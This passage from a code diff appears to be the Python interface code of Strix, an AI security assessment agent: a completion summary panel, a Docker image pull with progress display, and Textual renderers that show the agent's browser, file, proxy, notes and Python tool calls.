stats_text.append(str(vuln_count), style="bold yellow")
stats_text.append("", style="dim white")
stats_text.append("🤖 Agents Used: ", style="bold cyan")
stats_text.append(str(agent_count), style="bold white")
stats_text.append("", style="dim white")
stats_text.append("🛠️ Tools Called: ", style="bold cyan")
stats_text.append(str(tool_count), style="bold white")
return stats_text
def _build_llm_stats_text(tracer: Any) -> Text:
llm_stats_text = Text()
if not tracer:
return llm_stats_text
llm_stats = tracer.get_total_llm_stats()
total_stats = llm_stats["total"]
if total_stats["requests"] > 0:
llm_stats_text.append("📥 Input Tokens: ", style="bold cyan")
llm_stats_text.append(format_token_count(total_stats["input_tokens"]), style="bold white")
if total_stats["cached_tokens"] > 0:
llm_stats_text.append("", style="dim white")
llm_stats_text.append("⚡ Cached: ", style="bold green")
llm_stats_text.append(
format_token_count(total_stats["cached_tokens"]), style="bold green"
)
llm_stats_text.append("", style="dim white")
llm_stats_text.append("📤 Output Tokens: ", style="bold cyan")
llm_stats_text.append(format_token_count(total_stats["output_tokens"]), style="bold white")
if total_stats["cost"] > 0:
llm_stats_text.append("", style="dim white")
llm_stats_text.append("💰 Total Cost: $", style="bold cyan")
llm_stats_text.append(f"{total_stats['cost']:.4f}", style="bold yellow")
return llm_stats_text
def display_completion_message(args: argparse.Namespace, results_path: Path) -> None:
console = Console()
tracer = get_global_tracer()
target_value = next(iter(args.target_dict.values())) if args.target_dict else args.target
completion_text = Text()
completion_text.append("🦉 ", style="bold white")
completion_text.append("AGENT FINISHED", style="bold green")
completion_text.append("", style="dim white")
completion_text.append("Security assessment completed", style="white")
stats_text = _build_stats_text(tracer)
llm_stats_text = _build_llm_stats_text(tracer)
target_text = Text()
target_text.append("🎯 Target: ", style="bold cyan")
target_text.append(str(target_value), style="bold white")
results_text = Text()
results_text.append("📊 Results Saved To: ", style="bold cyan")
results_text.append(str(results_path), style="bold yellow")
if stats_text.plain:
if llm_stats_text.plain:
panel_content = Text.assemble(
completion_text,
"\n\n",
target_text,
"\n",
stats_text,
"\n",
llm_stats_text,
"\n",
results_text,
)
else:
panel_content = Text.assemble(
completion_text, "\n\n", target_text, "\n", stats_text, "\n", results_text
)
elif llm_stats_text.plain:
panel_content = Text.assemble(
completion_text, "\n\n", target_text, "\n", llm_stats_text, "\n", results_text
)
else:
panel_content = Text.assemble(completion_text, "\n\n", target_text, "\n", results_text)
panel = Panel(
panel_content,
title="[bold green]🛡️ STRIX CYBERSECURITY AGENT",
title_align="center",
border_style="green",
padding=(1, 2),
)
console.print("\n")
console.print(panel)
console.print()
def _check_docker_connection() -> Any:
try:
return docker.from_env()
except DockerException:
console = Console()
error_text = Text()
error_text.append("", style="bold red")
error_text.append("DOCKER NOT AVAILABLE", style="bold red")
error_text.append("\n\n", style="white")
error_text.append("Cannot connect to Docker daemon.\n", style="white")
error_text.append("Please ensure Docker is installed and running.\n\n", style="white")
error_text.append("Try running: ", style="dim white")
error_text.append("sudo systemctl start docker", style="dim cyan")
panel = Panel(
error_text,
title="[bold red]🛡️ STRIX STARTUP ERROR",
title_align="center",
border_style="red",
padding=(1, 2),
)
console.print("\n", panel, "\n")
sys.exit(1)
def _image_exists(client: Any) -> bool:
try:
client.images.get(STRIX_IMAGE)
except docker.errors.ImageNotFound:
return False
else:
return True
def _update_layer_status(layers_info: dict[str, str], layer_id: str, layer_status: str) -> None:
if "Pull complete" in layer_status or "Already exists" in layer_status:
layers_info[layer_id] = ""
elif "Downloading" in layer_status:
layers_info[layer_id] = ""
elif "Extracting" in layer_status:
layers_info[layer_id] = "📦"
elif "Waiting" in layer_status:
layers_info[layer_id] = ""
else:
layers_info[layer_id] = ""
def _process_pull_line(
line: dict[str, Any], layers_info: dict[str, str], status: Any, last_update: str
) -> str:
if "id" in line and "status" in line:
layer_id = line["id"]
_update_layer_status(layers_info, layer_id, line["status"])
completed = sum(1 for v in layers_info.values() if v == "")
total = len(layers_info)
if total > 0:
update_msg = f"[bold cyan]Progress: {completed}/{total} layers complete"
if update_msg != last_update:
status.update(update_msg)
return update_msg
elif "status" in line and "id" not in line:
global_status = line["status"]
if "Pulling from" in global_status:
status.update("[bold cyan]Fetching image manifest...")
elif "Digest:" in global_status:
status.update("[bold cyan]Verifying image...")
elif "Status:" in global_status:
status.update("[bold cyan]Finalizing...")
return last_update
def pull_docker_image() -> None:
console = Console()
client = _check_docker_connection()
if _image_exists(client):
return
console.print()
console.print(f"[bold cyan]🐳 Pulling Docker image:[/bold cyan] {STRIX_IMAGE}")
console.print(
"[dim yellow]This only happens on first run and may take a few minutes...[/dim yellow]"
)
console.print()
with console.status("[bold cyan]Downloading image layers...", spinner="dots") as status:
try:
layers_info: dict[str, str] = {}
last_update = ""
for line in client.api.pull(STRIX_IMAGE, stream=True, decode=True):
last_update = _process_pull_line(line, layers_info, status, last_update)
except DockerException as e:
console.print()
error_text = Text()
error_text.append("", style="bold red")
error_text.append("FAILED TO PULL IMAGE", style="bold red")
error_text.append("\n\n", style="white")
error_text.append(f"Could not download: {STRIX_IMAGE}\n", style="white")
error_text.append(str(e), style="dim red")
panel = Panel(
error_text,
title="[bold red]🛡️ DOCKER PULL ERROR",
title_align="center",
border_style="red",
padding=(1, 2),
)
console.print(panel, "\n")
sys.exit(1)
success_text = Text()
success_text.append("", style="bold green")
success_text.append("Successfully pulled Docker image", style="green")
console.print(success_text)
console.print()
def main() -> None:
if sys.platform == "win32":
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
pull_docker_image()
validate_environment()
asyncio.run(warm_up_llm())
args = parse_arguments()
if not args.run_name:
args.run_name = generate_run_name()
asyncio.run(run_strix_cli(args))
results_path = Path("agent_runs") / args.run_name
display_completion_message(args, results_path)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,39 @@
from . import (
agents_graph_renderer,
browser_renderer,
file_edit_renderer,
finish_renderer,
notes_renderer,
proxy_renderer,
python_renderer,
reporting_renderer,
scan_info_renderer,
terminal_renderer,
thinking_renderer,
user_message_renderer,
web_search_renderer,
)
from .base_renderer import BaseToolRenderer
from .registry import ToolTUIRegistry, get_tool_renderer, register_tool_renderer, render_tool_widget
__all__ = [
"BaseToolRenderer",
"ToolTUIRegistry",
"agents_graph_renderer",
"browser_renderer",
"file_edit_renderer",
"finish_renderer",
"get_tool_renderer",
"notes_renderer",
"proxy_renderer",
"python_renderer",
"register_tool_renderer",
"render_tool_widget",
"reporting_renderer",
"scan_info_renderer",
"terminal_renderer",
"thinking_renderer",
"user_message_renderer",
"web_search_renderer",
]

View File

@@ -0,0 +1,129 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class ViewAgentGraphRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "view_agent_graph"
css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: ARG003
content_text = "🕸️ [bold #fbbf24]Viewing agents graph[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class CreateAgentRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "create_agent"
css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
task = args.get("task", "")
name = args.get("name", "Agent")
header = f"🤖 [bold #fbbf24]Creating {name}[/]"
if task:
task_display = task[:400] + "..." if len(task) > 400 else task
content_text = f"{header}\n [dim]{cls.escape_markup(task_display)}[/]"
else:
content_text = f"{header}\n [dim]Spawning agent...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class SendMessageToAgentRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "send_message_to_agent"
css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
message = args.get("message", "")
header = "💬 [bold #fbbf24]Sending message[/]"
if message:
message_display = message[:400] + "..." if len(message) > 400 else message
content_text = f"{header}\n [dim]{cls.escape_markup(message_display)}[/]"
else:
content_text = f"{header}\n [dim]Sending...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class AgentFinishRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "agent_finish"
css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result_summary = args.get("result_summary", "")
findings = args.get("findings", [])
success = args.get("success", True)
header = (
"🏁 [bold #fbbf24]Agent completed[/]" if success else "🏁 [bold #fbbf24]Agent failed[/]"
)
if result_summary:
summary_display = (
result_summary[:400] + "..." if len(result_summary) > 400 else result_summary
)
content_parts = [f"{header}\n [bold]{cls.escape_markup(summary_display)}[/]"]
if findings and isinstance(findings, list):
finding_lines = [f"{finding}" for finding in findings[:3]]
if len(findings) > 3:
finding_lines.append(f"• ... +{len(findings) - 3} more findings")
content_parts.append(
f" [dim]{chr(10).join([cls.escape_markup(line) for line in finding_lines])}[/]"
)
content_text = "\n".join(content_parts)
else:
content_text = f"{header}\n [dim]Completing task...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class WaitForMessageRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "wait_for_message"
css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
reason = args.get("reason", "Waiting for messages from other agents or user input")
header = "⏸️ [bold #fbbf24]Waiting for messages[/]"
if reason:
reason_display = reason[:400] + "..." if len(reason) > 400 else reason
content_text = f"{header}\n [dim]{cls.escape_markup(reason_display)}[/]"
else:
content_text = f"{header}\n [dim]Agent paused until message received...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)

View File

@@ -0,0 +1,61 @@
from abc import ABC, abstractmethod
from typing import Any, ClassVar
from textual.widgets import Static
class BaseToolRenderer(ABC):
tool_name: ClassVar[str] = ""
css_classes: ClassVar[list[str]] = ["tool-call"]
@classmethod
@abstractmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
pass
@classmethod
def escape_markup(cls, text: str) -> str:
return text.replace("[", "\\[").replace("]", "\\]")
@classmethod
def format_args(cls, args: dict[str, Any], max_length: int = 500) -> str:
if not args:
return ""
args_parts = []
for k, v in args.items():
str_v = str(v)
if len(str_v) > max_length:
str_v = str_v[: max_length - 3] + "..."
args_parts.append(f" [dim]{k}:[/] {cls.escape_markup(str_v)}")
return "\n".join(args_parts)
@classmethod
def format_result(cls, result: Any, max_length: int = 1000) -> str:
if result is None:
return ""
str_result = str(result).strip()
if not str_result:
return ""
if len(str_result) > max_length:
str_result = str_result[: max_length - 3] + "..."
return cls.escape_markup(str_result)
@classmethod
def get_status_icon(cls, status: str) -> str:
status_icons = {
"running": "[#f59e0b]●[/#f59e0b] In progress...",
"completed": "[#22c55e]✓[/#22c55e] Done",
"failed": "[#dc2626]✗[/#dc2626] Failed",
"error": "[#dc2626]✗[/#dc2626] Error",
}
return status_icons.get(status, "[dim]○[/dim] Unknown")
@classmethod
def get_css_classes(cls, status: str) -> str:
base_classes = cls.css_classes.copy()
base_classes.append(f"status-{status}")
return " ".join(base_classes)

View File

@@ -0,0 +1,107 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class BrowserRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "browser_action"
css_classes: ClassVar[list[str]] = ["tool-call", "browser-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
status = tool_data.get("status", "unknown")
action = args.get("action", "unknown")
content = cls._build_sleek_content(action, args)
css_classes = cls.get_css_classes(status)
return Static(content, classes=css_classes)
@classmethod
def _build_sleek_content(cls, action: str, args: dict[str, Any]) -> str:
browser_icon = "🌐"
url = args.get("url")
text = args.get("text")
js_code = args.get("js_code")
if action in [
"launch",
"goto",
"new_tab",
"type",
"execute_js",
"click",
"double_click",
"hover",
]:
if action == "launch":
display_url = cls._format_url(url) if url else None
message = (
f"launching {display_url} on browser" if display_url else "launching browser"
)
elif action == "goto":
display_url = cls._format_url(url) if url else None
message = f"navigating to {display_url}" if display_url else "navigating"
elif action == "new_tab":
display_url = cls._format_url(url) if url else None
message = f"opening tab {display_url}" if display_url else "opening tab"
elif action == "type":
display_text = cls._format_text(text) if text else None
message = f"typing {display_text}" if display_text else "typing"
elif action == "execute_js":
display_js = cls._format_js(js_code) if js_code else None
message = (
f"executing javascript\n{display_js}" if display_js else "executing javascript"
)
else:
action_words = {
"click": "clicking",
"double_click": "double clicking",
"hover": "hovering",
}
message = action_words[action]
return f"{browser_icon} [#06b6d4]{message}[/]"
simple_actions = {
"back": "going back in browser history",
"forward": "going forward in browser history",
"refresh": "refreshing browser tab",
"close_tab": "closing browser tab",
"switch_tab": "switching browser tab",
"list_tabs": "listing browser tabs",
"view_source": "viewing page source",
"screenshot": "taking screenshot of browser tab",
"wait": "waiting...",
"close": "closing browser",
}
if action in simple_actions:
return f"{browser_icon} [#06b6d4]{simple_actions[action]}[/]"
return f"{browser_icon} [#06b6d4]{action}[/]"
@classmethod
def _format_url(cls, url: str) -> str:
if len(url) > 300:
url = url[:297] + "..."
return cls.escape_markup(url)
@classmethod
def _format_text(cls, text: str) -> str:
if len(text) > 200:
text = text[:197] + "..."
return cls.escape_markup(text)
@classmethod
def _format_js(cls, js_code: str) -> str:
if len(js_code) > 200:
js_code = js_code[:197] + "..."
return f"[white]{cls.escape_markup(js_code)}[/white]"

View File

@@ -0,0 +1,95 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class StrReplaceEditorRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "str_replace_editor"
css_classes: ClassVar[list[str]] = ["tool-call", "file-edit-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result = tool_data.get("result")
command = args.get("command", "")
path = args.get("path", "")
if command == "view":
header = "📖 [bold #10b981]Reading file[/]"
elif command == "str_replace":
header = "✏️ [bold #10b981]Editing file[/]"
elif command == "create":
header = "📝 [bold #10b981]Creating file[/]"
else:
header = "📄 [bold #10b981]File operation[/]"
if (result and isinstance(result, dict) and "content" in result) or path:
path_display = path[-60:] if len(path) > 60 else path
content_text = f"{header} [dim]{cls.escape_markup(path_display)}[/]"
else:
content_text = f"{header} [dim]Processing...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ListFilesRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "list_files"
css_classes: ClassVar[list[str]] = ["tool-call", "file-edit-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
path = args.get("path", "")
header = "📂 [bold #10b981]Listing files[/]"
if path:
path_display = path[-60:] if len(path) > 60 else path
content_text = f"{header} [dim]{cls.escape_markup(path_display)}[/]"
else:
content_text = f"{header} [dim]Current directory[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class SearchFilesRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "search_files"
css_classes: ClassVar[list[str]] = ["tool-call", "file-edit-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
path = args.get("path", "")
regex = args.get("regex", "")
header = "🔍 [bold purple]Searching files[/]"
if path and regex:
path_display = path[-30:] if len(path) > 30 else path
regex_display = regex[:30] if len(regex) > 30 else regex
content_text = (
f"{header} [dim]{cls.escape_markup(path_display)} for "
f"'{cls.escape_markup(regex_display)}'[/]"
)
elif path:
path_display = path[-60:] if len(path) > 60 else path
content_text = f"{header} [dim]{cls.escape_markup(path_display)}[/]"
elif regex:
regex_display = regex[:60] if len(regex) > 60 else regex
content_text = f"{header} [dim]'{cls.escape_markup(regex_display)}'[/]"
else:
content_text = f"{header} [dim]Searching...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)

View File

@@ -0,0 +1,32 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class FinishScanRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "finish_scan"
css_classes: ClassVar[list[str]] = ["tool-call", "finish-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
content = args.get("content", "")
success = args.get("success", True)
header = (
"🏁 [bold #dc2626]Finishing Scan[/]" if success else "🏁 [bold #dc2626]Scan Failed[/]"
)
if content:
content_display = content[:600] + "..." if len(content) > 600 else content
content_text = f"{header}\n [bold]{cls.escape_markup(content_display)}[/]"
else:
content_text = f"{header}\n [dim]Generating final report...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)

View File

@@ -0,0 +1,108 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class CreateNoteRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "create_note"
css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
title = args.get("title", "")
content = args.get("content", "")
header = "📝 [bold #fbbf24]Note[/]"
if title:
title_display = title[:100] + "..." if len(title) > 100 else title
note_parts = [f"{header}\n [bold]{cls.escape_markup(title_display)}[/]"]
if content:
content_display = content[:200] + "..." if len(content) > 200 else content
note_parts.append(f" [dim]{cls.escape_markup(content_display)}[/]")
content_text = "\n".join(note_parts)
else:
content_text = f"{header}\n [dim]Creating note...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class DeleteNoteRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "delete_note"
css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: ARG003
header = "🗑️ [bold #fbbf24]Delete Note[/]"
content_text = f"{header}\n [dim]Deleting...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class UpdateNoteRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "update_note"
css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
title = args.get("title", "")
content = args.get("content", "")
header = "✏️ [bold #fbbf24]Update Note[/]"
if title or content:
note_parts = [header]
if title:
title_display = title[:100] + "..." if len(title) > 100 else title
note_parts.append(f" [bold]{cls.escape_markup(title_display)}[/]")
if content:
content_display = content[:200] + "..." if len(content) > 200 else content
note_parts.append(f" [dim]{cls.escape_markup(content_display)}[/]")
content_text = "\n".join(note_parts)
else:
content_text = f"{header}\n [dim]Updating...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ListNotesRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "list_notes"
css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
result = tool_data.get("result")
header = "📋 [bold #fbbf24]Listing notes[/]"
if result and isinstance(result, dict) and "notes" in result:
notes = result["notes"]
if isinstance(notes, list):
count = len(notes)
content_text = f"{header}\n [dim]{count} notes found[/]"
else:
content_text = f"{header}\n [dim]No notes found[/]"
else:
content_text = f"{header}\n [dim]Listing notes...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)

View File

@@ -0,0 +1,255 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class ListRequestsRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "list_requests"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result = tool_data.get("result")
httpql_filter = args.get("httpql_filter")
header = "📋 [bold #06b6d4]Listing requests[/]"
if result and isinstance(result, dict) and "requests" in result:
requests = result["requests"]
if isinstance(requests, list) and requests:
request_lines = []
for req in requests[:3]:
if isinstance(req, dict):
method = req.get("method", "?")
path = req.get("path", "?")
response = req.get("response") or {}
status = response.get("statusCode", "?")
line = f"{method} {path}{status}"
request_lines.append(line)
if len(requests) > 3:
request_lines.append(f"... +{len(requests) - 3} more")
escaped_lines = [cls.escape_markup(line) for line in request_lines]
content_text = f"{header}\n [dim]{chr(10).join(escaped_lines)}[/]"
else:
content_text = f"{header}\n [dim]No requests found[/]"
elif httpql_filter:
filter_display = (
httpql_filter[:300] + "..." if len(httpql_filter) > 300 else httpql_filter
)
content_text = f"{header}\n [dim]{cls.escape_markup(filter_display)}[/]"
else:
content_text = f"{header}\n [dim]All requests[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ViewRequestRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "view_request"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result = tool_data.get("result")
part = args.get("part", "request")
header = f"👀 [bold #06b6d4]Viewing {part}[/]"
if result and isinstance(result, dict):
if "content" in result:
content = result["content"]
content_preview = content[:500] + "..." if len(content) > 500 else content
content_text = f"{header}\n [dim]{cls.escape_markup(content_preview)}[/]"
elif "matches" in result:
matches = result["matches"]
if isinstance(matches, list) and matches:
match_lines = [
match["match"]
for match in matches[:3]
if isinstance(match, dict) and "match" in match
]
if len(matches) > 3:
match_lines.append(f"... +{len(matches) - 3} more matches")
escaped_lines = [cls.escape_markup(line) for line in match_lines]
content_text = f"{header}\n [dim]{chr(10).join(escaped_lines)}[/]"
else:
content_text = f"{header}\n [dim]No matches found[/]"
else:
content_text = f"{header}\n [dim]Viewing content...[/]"
else:
content_text = f"{header}\n [dim]Loading...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class SendRequestRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "send_request"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result = tool_data.get("result")
method = args.get("method", "GET")
url = args.get("url", "")
header = f"📤 [bold #06b6d4]Sending {method}[/]"
if result and isinstance(result, dict):
status_code = result.get("status_code")
response_body = result.get("body", "")
if status_code:
response_preview = f"Status: {status_code}"
if response_body:
body_preview = (
response_body[:300] + "..." if len(response_body) > 300 else response_body
)
response_preview += f"\n{body_preview}"
content_text = f"{header}\n [dim]{cls.escape_markup(response_preview)}[/]"
else:
content_text = f"{header}\n [dim]Response received[/]"
elif url:
url_display = url[:400] + "..." if len(url) > 400 else url
content_text = f"{header}\n [dim]{cls.escape_markup(url_display)}[/]"
else:
content_text = f"{header}\n [dim]Sending...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class RepeatRequestRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "repeat_request"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result = tool_data.get("result")
modifications = args.get("modifications", {})
header = "🔄 [bold #06b6d4]Repeating request[/]"
if result and isinstance(result, dict):
status_code = result.get("status_code")
response_body = result.get("body", "")
if status_code:
response_preview = f"Status: {status_code}"
if response_body:
body_preview = (
response_body[:300] + "..." if len(response_body) > 300 else response_body
)
response_preview += f"\n{body_preview}"
content_text = f"{header}\n [dim]{cls.escape_markup(response_preview)}[/]"
else:
content_text = f"{header}\n [dim]Response received[/]"
elif modifications:
mod_text = str(modifications)
mod_display = mod_text[:400] + "..." if len(mod_text) > 400 else mod_text
content_text = f"{header}\n [dim]{cls.escape_markup(mod_display)}[/]"
else:
content_text = f"{header}\n [dim]No modifications[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ScopeRulesRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "scope_rules"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: ARG003
header = "⚙️ [bold #06b6d4]Updating proxy scope[/]"
content_text = f"{header}\n [dim]Configuring...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ListSitemapRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "list_sitemap"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
result = tool_data.get("result")
header = "🗺️ [bold #06b6d4]Listing sitemap[/]"
if result and isinstance(result, dict) and "entries" in result:
entries = result["entries"]
if isinstance(entries, list) and entries:
entry_lines = []
for entry in entries[:4]:
if isinstance(entry, dict):
label = entry.get("label", "?")
kind = entry.get("kind", "?")
line = f"{kind}: {label}"
entry_lines.append(line)
if len(entries) > 4:
entry_lines.append(f"... +{len(entries) - 4} more")
escaped_lines = [cls.escape_markup(line) for line in entry_lines]
content_text = f"{header}\n [dim]{chr(10).join(escaped_lines)}[/]"
else:
content_text = f"{header}\n [dim]No entries found[/]"
else:
content_text = f"{header}\n [dim]Loading...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ViewSitemapEntryRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "view_sitemap_entry"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
result = tool_data.get("result")
header = "📍 [bold #06b6d4]Viewing sitemap entry[/]"
if result and isinstance(result, dict):
if "entry" in result:
entry = result["entry"]
if isinstance(entry, dict):
label = entry.get("label", "")
kind = entry.get("kind", "")
if label and kind:
entry_info = f"{kind}: {label}"
content_text = f"{header}\n [dim]{cls.escape_markup(entry_info)}[/]"
else:
content_text = f"{header}\n [dim]Entry details loaded[/]"
else:
content_text = f"{header}\n [dim]Entry details loaded[/]"
else:
content_text = f"{header}\n [dim]Loading entry...[/]"
else:
content_text = f"{header}\n [dim]Loading...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)

View File

@@ -0,0 +1,34 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class PythonRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "python_action"
css_classes: ClassVar[list[str]] = ["tool-call", "python-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
action = args.get("action", "")
code = args.get("code", "")
header = "</> [bold #3b82f6]Python[/]"
if code and action in ["new_session", "execute"]:
code_display = code[:250] + "..." if len(code) > 250 else code
content_text = f"{header}\n [italic white]{cls.escape_markup(code_display)}[/]"
elif action == "close":
content_text = f"{header}\n [dim]Closing session...[/]"
elif action == "list_sessions":
content_text = f"{header}\n [dim]Listing sessions...[/]"
else:
content_text = f"{header}\n [dim]Running...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)

View File

@@ -0,0 +1,72 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
class ToolTUIRegistry:
_renderers: ClassVar[dict[str, type[BaseToolRenderer]]] = {}
@classmethod
def register(cls, renderer_class: type[BaseToolRenderer]) -> None:
if not renderer_class.tool_name:
raise ValueError(f"Renderer {renderer_class.__name__} must define tool_name")
cls._renderers[renderer_class.tool_name] = renderer_class
@classmethod
def get_renderer(cls, tool_name: str) -> type[BaseToolRenderer] | None:
return cls._renderers.get(tool_name)
@classmethod
def list_tools(cls) -> list[str]:
return list(cls._renderers.keys())
@classmethod
def has_renderer(cls, tool_name: str) -> bool:
return tool_name in cls._renderers
def register_tool_renderer(renderer_class: type[BaseToolRenderer]) -> type[BaseToolRenderer]:
ToolTUIRegistry.register(renderer_class)
return renderer_class
def get_tool_renderer(tool_name: str) -> type[BaseToolRenderer] | None:
return ToolTUIRegistry.get_renderer(tool_name)
def render_tool_widget(tool_data: dict[str, Any]) -> Static:
tool_name = tool_data.get("tool_name", "")
renderer = get_tool_renderer(tool_name)
if renderer:
return renderer.render(tool_data)
return _render_default_tool_widget(tool_data)
def _render_default_tool_widget(tool_data: dict[str, Any]) -> Static:
tool_name = BaseToolRenderer.escape_markup(tool_data.get("tool_name", "Unknown Tool"))
args = tool_data.get("args", {})
status = tool_data.get("status", "unknown")
result = tool_data.get("result")
status_text = BaseToolRenderer.get_status_icon(status)
header = f"→ Using tool [bold blue]{tool_name}[/]"
content_parts = [header]
args_str = BaseToolRenderer.format_args(args)
if args_str:
content_parts.append(args_str)
if status in ["completed", "failed", "error"] and result is not None:
result_str = BaseToolRenderer.format_result(result)
if result_str:
content_parts.append(f"[bold]Result:[/] {result_str}")
else:
content_parts.append(status_text)
css_classes = BaseToolRenderer.get_css_classes(status)
return Static("\n".join(content_parts), classes=css_classes)

View File

@@ -0,0 +1,53 @@
from typing import Any, ClassVar
